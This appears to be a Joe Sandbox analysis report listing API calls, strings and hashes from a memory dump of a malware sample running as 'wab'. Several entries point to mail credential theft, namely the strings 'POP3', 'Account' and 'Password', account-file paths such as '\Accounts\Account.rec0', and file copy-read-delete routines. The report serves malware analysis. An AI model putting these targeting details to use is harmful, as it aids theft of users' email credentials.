                                                • API String ID: 1703294689-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 222E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D1B
                                                  • Part of subcall function 222E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 222E1D37
                                                  • Part of subcall function 222E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D4B
                                                • _strlen.LIBCMT ref: 222E1855
                                                • _strlen.LIBCMT ref: 222E1869
                                                • _strlen.LIBCMT ref: 222E188B
                                                • _strlen.LIBCMT ref: 222E18AE
                                                • _strlen.LIBCMT ref: 222E18C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen$File$CopyCreateDelete
                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                • API String ID: 3296212668-3023110444
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                • API String ID: 4218353326-230879103
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 222E7D06
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90D7
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90E9
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90FB
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E910D
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E911F
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9131
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9143
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9155
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9167
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9179
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E918B
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E919D
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E91AF
                                                • _free.LIBCMT ref: 222E7CFB
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E7D1D
                                                • _free.LIBCMT ref: 222E7D32
                                                • _free.LIBCMT ref: 222E7D3D
                                                • _free.LIBCMT ref: 222E7D5F
                                                • _free.LIBCMT ref: 222E7D72
                                                • _free.LIBCMT ref: 222E7D80
                                                • _free.LIBCMT ref: 222E7D8B
                                                • _free.LIBCMT ref: 222E7DC3
                                                • _free.LIBCMT ref: 222E7DCA
                                                • _free.LIBCMT ref: 222E7DE7
                                                • _free.LIBCMT ref: 222E7DFF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 5f115ffed6cfb33fb6366041b769f39c3b11b01eacbb4f01b43d9769c65c91f3
                                                • Instruction ID: 42d8e139bb675be4eaaf90a115755d7491c8f404606dd24dcd4877ab28b71268
                                                • Opcode Fuzzy Hash: 5f115ffed6cfb33fb6366041b769f39c3b11b01eacbb4f01b43d9769c65c91f3
                                                • Instruction Fuzzy Hash: 7D316D31510306DFDB219E38DE41BEA77EAEF00354F904469EA4ED7198DB32B9A0A720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • _free.LIBCMT ref: 222E59EA
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E59F6
                                                • _free.LIBCMT ref: 222E5A01
                                                • _free.LIBCMT ref: 222E5A0C
                                                • _free.LIBCMT ref: 222E5A17
                                                • _free.LIBCMT ref: 222E5A22
                                                • _free.LIBCMT ref: 222E5A2D
                                                • _free.LIBCMT ref: 222E5A38
                                                • _free.LIBCMT ref: 222E5A43
                                                • _free.LIBCMT ref: 222E5A51
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 8d6d2d6d2e8c5201cffd6fb99e757235eaf2e119ea82a7bad1dc9339421cfabc
                                                • Instruction ID: 4877cdbaca1e23c6a1a146f08394d053cb65bcbf41bd425d96c1701246061c2b
                                                • Opcode Fuzzy Hash: 8d6d2d6d2e8c5201cffd6fb99e757235eaf2e119ea82a7bad1dc9339421cfabc
                                                • Instruction Fuzzy Hash: A1117A79520348EFCB21DF54CD41CDD3F69EF14390B954195BA0E4B129DA32FA70AB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D1B
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 222E1D37
                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D4B
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D58
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D72
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D7D
                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D8A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 1454806937-0
                                                • Opcode ID: 86f549788cb2dcb4992d56432fd8abb7d93950479c8125fb0bc453e5be76bbb2
                                                • Instruction ID: eadbcc542e3676bbe8299132e858c69bcfa50ccff3dddf1647c334a42dfcba73
                                                • Opcode Fuzzy Hash: 86f549788cb2dcb4992d56432fd8abb7d93950479c8125fb0bc453e5be76bbb2
                                                • Instruction Fuzzy Hash: 89214CB194132CEFD7109BA0CC8CFEE76ACEB18354F4409A5F91AD2148D676AE45AA70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,222E9C07,?,00000000,?,00000000,00000000), ref: 222E94D4
                                                • __fassign.LIBCMT ref: 222E954F
                                                • __fassign.LIBCMT ref: 222E956A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 222E9590
                                                • WriteFile.KERNEL32(?,?,00000000,222E9C07,00000000,?,?,?,?,?,?,?,?,?,222E9C07,?), ref: 222E95AF
                                                • WriteFile.KERNEL32(?,?,00000001,222E9C07,00000000,?,?,?,?,?,?,?,?,?,222E9C07,?), ref: 222E95E8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 7fecb981f1ded095d9dca9abd4d57b1db2c17226b0b062bd153d6387bf5c8377
                                                • Instruction ID: 66156f07ec8414612fe229317b983998503fe6710bf9a747b2fba2ad4801259b
                                                • Opcode Fuzzy Hash: 7fecb981f1ded095d9dca9abd4d57b1db2c17226b0b062bd153d6387bf5c8377
                                                • Instruction Fuzzy Hash: 31519EB1D00349AFDB10CFA4CC95ADEBBF8EF49310F14451BEA5AE7285D632A941CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 222E339B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 222E33A3
                                                • _ValidateLocalCookies.LIBCMT ref: 222E3431
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 222E345C
                                                • _ValidateLocalCookies.LIBCMT ref: 222E34B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 0a516c5781df024265cd3beed429a9670090761829b9829ccd2d589ccf62e8ab
                                                • Instruction ID: a6d223f34eccdfb855142f147eadc7332296b8503e2faea00b994c78abebdb47
                                                • Opcode Fuzzy Hash: 0a516c5781df024265cd3beed429a9670090761829b9829ccd2d589ccf62e8ab
                                                • Instruction Fuzzy Hash: C741D434E003499BCB00CF68CE44AAEBBF5AF45325F808195E91E9F259D737BA01DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 222E9221: _free.LIBCMT ref: 222E924A
                                                • _free.LIBCMT ref: 222E92AB
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E92B6
                                                • _free.LIBCMT ref: 222E92C1
                                                • _free.LIBCMT ref: 222E9315
                                                • _free.LIBCMT ref: 222E9320
                                                • _free.LIBCMT ref: 222E932B
                                                • _free.LIBCMT ref: 222E9336
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction ID: a71fd6845ff853690bd215ce3a99d28cafefe20b234e1350681d1103b4c00fd7
                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction Fuzzy Hash: 99118131950B08FADA30ABB0DD46FCB7B9D9F14700FC00826A69F7605ADAA6B5247751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,222E6FFD,00000000,?,?,?,222E8A72,?,?,00000100), ref: 222E887B
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,222E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 222E8901
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 222E89FB
                                                • __freea.LIBCMT ref: 222E8A08
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                • __freea.LIBCMT ref: 222E8A11
                                                • __freea.LIBCMT ref: 222E8A36
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 61625240d04e9fd4f500338af354f2e405385349dc579d15d0ee2e746281edf3
                                                • Instruction ID: 27fa976499f32b86885997c9b16d784524c978b6159fb7fe79debfc8dc1aa412
                                                • Opcode Fuzzy Hash: 61625240d04e9fd4f500338af354f2e405385349dc579d15d0ee2e746281edf3
                                                • Instruction Fuzzy Hash: 7F511972610307ABDB148E60CD44EBB37A9EB54754FD00628FD4ED6258EB3AFC50E662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _strlen.LIBCMT ref: 222E1607
                                                • _strcat.LIBCMT ref: 222E161D
                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,222E190E,?,?,00000000,?,00000000), ref: 222E1643
                                                • lstrcatW.KERNEL32(?,?), ref: 222E165A
                                                • lstrlenW.KERNEL32(?,?,?,?,?,222E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 222E1661
                                                • lstrcatW.KERNEL32(00001008,?), ref: 222E1686
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                • String ID:
                                                • API String ID: 1922816806-0
                                                • Opcode ID: 62a49cd8823babd881dabcf41c3c586628f729a3fcc76c718e7054d59b29b886
                                                • Instruction ID: 5ff1009fc20c83cb1534af0ee8beb4735da618322eb5f28158409a0aed34c861
                                                • Opcode Fuzzy Hash: 62a49cd8823babd881dabcf41c3c586628f729a3fcc76c718e7054d59b29b886
                                                • Instruction Fuzzy Hash: EB210A36A00314ABC705DB54DC84EEE77B8EF8C710F54442AE909EB148DB35BA41E7A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1038
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 222E104B
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 222E1061
                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 222E1075
                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 222E1090
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 222E10B8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$AttributesFilelstrcat
                                                • String ID:
                                                • API String ID: 3594823470-0
                                                • Opcode ID: 00fb111d1292c26613706a71209ca321dad8b3ec82a8464acbcf6baa32f48cee
                                                • Instruction ID: f0d6da778e9a4e76571975b10a2cecd77b9b60ac5a78a25f5b33fc0a7ed2197e
                                                • Opcode Fuzzy Hash: 00fb111d1292c26613706a71209ca321dad8b3ec82a8464acbcf6baa32f48cee
                                                • Instruction Fuzzy Hash: 4821D1359003299BCF18DB60DD48ECB372CEF44324F4046A6E85AA31B9DA72BE85DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,222E3518,222E23F1,222E1F17), ref: 222E3864
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 222E3872
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 222E388B
                                                • SetLastError.KERNEL32(00000000,?,222E3518,222E23F1,222E1F17), ref: 222E38DD
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 723f4f962a963bc480f7e0feda47a9425cdacd4149c3d89268a4a606e83ff023
                                                • Instruction ID: 0e346ecdb01225748f0871383a9eedfd31a4cf1268dde49c4d91ad6e0f2578ee
                                                • Opcode Fuzzy Hash: 723f4f962a963bc480f7e0feda47a9425cdacd4149c3d89268a4a606e83ff023
                                                • Instruction Fuzzy Hash: 0D012D326087125DA60069756F88A761758EF15776BD0032EE52E5C0DDDF17B400B344
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,222E6C6C), ref: 222E5AFA
                                                • _free.LIBCMT ref: 222E5B2D
                                                • _free.LIBCMT ref: 222E5B55
                                                • SetLastError.KERNEL32(00000000,?,?,222E6C6C), ref: 222E5B62
                                                • SetLastError.KERNEL32(00000000,?,?,222E6C6C), ref: 222E5B6E
                                                • _abort.LIBCMT ref: 222E5B74
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                 • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: c99b87ac043f15034156026a0ff1588c58ea1153f4fef3f02876ebdb4e36da09
                                                • Instruction ID: ead2394b4a71d8ff0138d2be1a99a3443d40a66611d5225b53cd21ec235b1ab7
                                                • Opcode Fuzzy Hash: c99b87ac043f15034156026a0ff1588c58ea1153f4fef3f02876ebdb4e36da09
                                                • Instruction Fuzzy Hash: C2F0F971570701A6C2012E349E48F4B275D8FE1771B940128FD1F9618DFE6BB4227170
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,?,?,?,222E10DF,?,?,?,00000000), ref: 222E1E9A
                                                  • Part of subcall function 222E1E89: lstrcatW.KERNEL32(?,?), ref: 222E1EAC
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EB3
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EC8
                                                  • Part of subcall function 222E1E89: lstrcatW.KERNEL32(?,222E10DF), ref: 222E1ED3
                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 222E122A
                                                  • Part of subcall function 222E173A: _strlen.LIBCMT ref: 222E1855
                                                  • Part of subcall function 222E173A: _strlen.LIBCMT ref: 222E1869
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                • API String ID: 4036392271-1520055953
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,222E4AEA,?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000), ref: 222E4B59
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 222E4B6C
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,222E4AEA,?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082), ref: 222E4B8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 222E715C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 222E717F
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 222E71A5
                                                • _free.LIBCMT ref: 222E71B8
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 222E71C7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000000,222E636D,222E5713,00000000,?,222E2249,?,?,222E1D66,00000000,?,?,00000000), ref: 222E5B7F
                                                • _free.LIBCMT ref: 222E5BB4
                                                • _free.LIBCMT ref: 222E5BDB
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E5BE8
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E5BF1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,?,222E10DF,?,?,?,00000000), ref: 222E1E9A
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1EAC
                                                • lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EB3
                                                • lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EC8
                                                • lstrcatW.KERNEL32(?,222E10DF), ref: 222E1ED3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
